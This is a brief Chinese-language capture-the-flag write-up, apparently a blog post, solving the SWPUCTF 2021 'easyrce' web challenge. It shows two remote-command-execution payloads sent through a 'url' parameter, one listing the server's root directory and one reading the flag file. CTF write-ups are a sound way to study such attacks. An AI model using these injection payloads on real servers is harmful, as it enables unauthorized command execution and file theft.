[SWPUCTF 2021 新生赛]easyrce

打开环境

[SWPUCTF 2021 新生赛]easyrce_第1张图片

他这儿说了参数就是url,一道简单的rce,构造playload:

?url=system("ls /");

[SWPUCTF 2021 新生赛]easyrce_第2张图片

接着下一步,继续构造playload:

?url=system("cat /fla...ag");

得到flag

[SWPUCTF 2021 新生赛]easyrce_第3张图片

你可能感兴趣的:(NSSCTF,web)